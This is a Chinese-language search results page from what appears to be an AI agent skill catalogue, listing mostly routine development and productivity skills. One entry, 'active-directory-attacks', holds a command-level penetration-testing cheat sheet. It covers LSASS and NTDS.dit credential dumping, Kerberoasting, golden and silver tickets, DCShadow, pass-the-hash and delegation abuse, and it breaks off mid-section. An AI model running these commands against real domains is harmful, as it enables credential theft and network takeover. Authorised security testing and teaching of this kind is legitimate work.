搜索结果
全部能力
找到 17783 个相关结果
通用助手 / 编排推荐
feed-catchup
feed-catchup
Catch up on your RSS feed — highlights up top, full browse below
软件工程 / 诊断修复
feishu-docx
feishu-docx
Export Feishu/Lark cloud documents to Markdown. Supports docx, sheets, bitable, and wiki. Use this skill when you need to read, analyze, or reference content…
软件工程 / 部署发布
azure
azure
Azure cloud development guidelines for ARM templates, Azure Pipelines, Kubernetes, and cloud-native services.
通用助手 / 编排推荐
fix-flaky-tests
fix-flaky-tests
Fixes flaky tests by analyzing failure patterns from Tuist test insights, identifying root causes, and applying targeted corrections. Can be invoked with a…
软件工程 / 部署发布
ce-release-notes
ce-release-notes
Summarize recent compound-engineering plugin releases, or answer a specific question about a past release with a version citation. Use when the user types…
研究学习 / 检索整理
docs-search
docs-search
Searches the aem.live documentation for information on AEM Edge Delivery Services features. Use this skill when you need more information about a feature, want…
通用助手 / 编排推荐
hive-setup
hive-setup
Install hive-evolve, register an agent, clone a task, and prepare the environment. Use when user wants to set up hive, join a swarm, or get started with a…
软件工程 / 部署发布
bash-defensive-patterns
bash-defensive-patterns
Master defensive Bash programming techniques for production-grade scripts. Use when writing robust shell scripts, CI/CD pipelines, or system utilities…
软件工程 / 诊断修复
event-sourcing-architect
event-sourcing-architect
Expert in event sourcing, CQRS, and event-driven architecture patterns. Masters event store design, projection building, saga orchestration, and eventual…
研究学习 / 检索整理
review-docs
review-docs
Review and improve documentation with parallel evaluation and iterative improvement loop.
安全与治理 / 审核评估
provider-pattern
provider-pattern
Teaches the provider pattern for sharing data across component trees. Use when multiple nested components need access to the same data and prop drilling…
研究学习 / 检索整理
ln-1000-pipeline-orchestrator
ln-1000-pipeline-orchestrator
Drives a Story through full pipeline (tasks, validation, execution, quality). Use when executing a Story end-to-end from kanban board.
通用助手 / 编排推荐
migrate-nullable-references
migrate-nullable-references
Enable nullable reference types in a C# project and systematically resolve all warnings. USE FOR: adopting NRTs in existing codebases, file-by-file or project-wide migration, fixing CS8602/CS8618/CS86xx warnings, annotating APIs for nullability, cleaning up null-forgiving operators, upgrading dependencies with new nullable annotations. DO NOT USE FOR: projects already fully migrated with zero warnings (unless auditing suppressions), fixing a handful of nullable warnings in code that already has NRTs enabled, suppressing warnings without fixing them, C# 7.3 or earlier projects. INVOKES: Get-NullableReadiness.ps1 scanner script.
通用助手 / 编排推荐
langchain-development
langchain-development
Expert guidance for LangChain and LangGraph development with Python, covering chain composition, agents, memory, and RAG implementations.
通用助手 / 编排推荐
memory-defrag
memory-defrag
Defragment and reorganize agent memory files: split bloated files, merge duplicates, remove stale information, and restructure the memory hierarchy. Use when…
通用助手 / 编排推荐
prototype-pattern
prototype-pattern
Teaches the prototype pattern for property sharing via the prototype chain. Use when creating many objects of the same type that should share methods or…
研究学习 / 检索整理
API 筛选与排序
api-filtering-sorting
为 API 实现高级过滤和排序功能,包含查询解析、字段验证和优化。适用于构建搜索功能、复杂查询或灵活的数据检索端点。
通用助手 / 编排推荐
plan-task
plan-task
Refine, parallelize, and verify a draft task specification into a fully planned implementation-ready task
安全与治理 / 审核评估
Active Directory 攻击
active-directory-attacks
Active Directory 渗透测试技术指南 ## 信息收集 ### 域基础信息 - `nltest /domain_trusts` - 查看域信任关系 - `net view /domain` - 枚举域列表 - `nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>` - 定位域控制器 ### BloodHound 资产发现 ```powershell # SharpHound 数据收集 Invoke-BloodHound -CollectionMethod All -Domain target.com -ZipFileName loot.zip ``` ### LDAP 查询 ```powershell # 查找域管账户 ([adsisearcher]"(&(objectCategory=person)(objectClass=user)(adminCount=1))").FindAll() # 查找非约束委派的服务账户 Get-ADObject -LDAPFilter "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)(samAccountType=805306368))" ``` ## 凭据获取 ### LSASS 内存提取 ```powershell # procdump + mimikatz 离线解析 procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` ### SAM/NTDS.dit 提取 ```powershell # Volume Shadow Copy 方式 vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\loot\ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\loot\ # ntdsutil 官方工具 ntdsutil "ac i ntds" "ifm" "create full c:\loot" q q ``` ### Kerberoasting ```powershell # 请求 SPN 服务票据 Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.target.com:1433" # Rubeus 自动化 Rubeus.exe kerberoast /outfile:hashes.txt ``` ## Kerberos 攻击 ### AS-REP Roasting ```powershell # 查找 "Do not require Kerberos preauthentication" 账户 Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth # Rubeus 攻击 Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt ``` ### Golden Ticket ```powershell # 需要 krbtgt 账户的 NTLM hash mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt mimikatz # kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-... /krbtgt:hash /ptt ``` ### Silver Ticket ```powershell # 针对特定服务,需要服务账户 NTLM hash mimikatz # kerberos::golden /user:fakeuser /domain:target.com /sid:S-1-5-21-... /target:sql01.target.com /service:MSSQLSvc /rc4:servicehash /ptt ``` ### DCShadow ```powershell # 需要域管权限,注册伪造 DC mimikatz # lsadump::dcshadow /object:targetuser /attribute:Description /value:"backdoor" ``` ## 横向移动 ### Pass-the-Hash ```powershell # mimikatz sekurlsa::pth /user:admin /domain:target.com /ntlm:hash /run:powershell.exe # Invoke-WMIExec Invoke-WMIExec -Target dc01.target.com -Username admin -Hash hash -Command "powershell -enc ..." ``` ### Over-Pass-the-Hash ```powershell # 获取 TGT 后使用正常 Kerberos 认证 Rubeus.exe asktgt /user:admin /rc4:hash /ptt ``` ### Pass-the-Ticket ```powershell # 导出票据后注入 mimikatz # sekurlsa::tickets /export mimikatz # kerberos::ptt [0;123456]-0-0-40810000-admin@krbtgt-target.com.kirbi ``` ### 约束委派滥用 ```powershell # 配置 S4U2Self + S4U2Proxy Rubeus.exe s4u /user:svc_account /rc4:hash /impersonateuser:admin /msdsspn:cifs/target.target.com /ptt ``` ### 基于资源的约束委派 (RBCD
软件工程 / 部署发布
container-registry-management
container-registry-management
Manage container registries (Docker Hub, ECR, GCR) with image scanning, retention policies, and access control.